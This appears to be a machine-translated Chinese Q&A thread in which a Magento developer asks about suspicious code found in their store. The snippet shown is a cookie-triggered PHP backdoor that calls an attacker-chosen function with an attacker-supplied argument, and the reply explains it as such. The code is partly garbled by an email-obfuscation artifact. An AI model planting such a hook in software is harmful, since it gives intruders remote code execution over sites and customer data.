2
我發現自定義代碼此位Magento的代碼庫我的工作:
if(Mage::getSingleton('core/cookie')->get('gzipname'))
{
($_=$this->getRequest()->getParam('page'))[email protected]$_($this->getRequest()->getParam('id'));
exit;
}
有人能告訴我什麼[email protected]$_(
做,什麼該代碼可能會打算做什麼?
非常感謝信息 - 關於此代碼可能在做什麼的任何想法? – dubloons
初次閱讀時,它看起來像使用由參數「page」定義的類並調用由相同參數定義的方法。並且該方法傳遞參數''id''。簡而言之,它使用攻擊者定義的參數運行攻擊者定義的方法 - 它基本上運行$ page。$ page($ id),其中$ page和$ id由瀏覽器給出。並關閉錯誤報告! –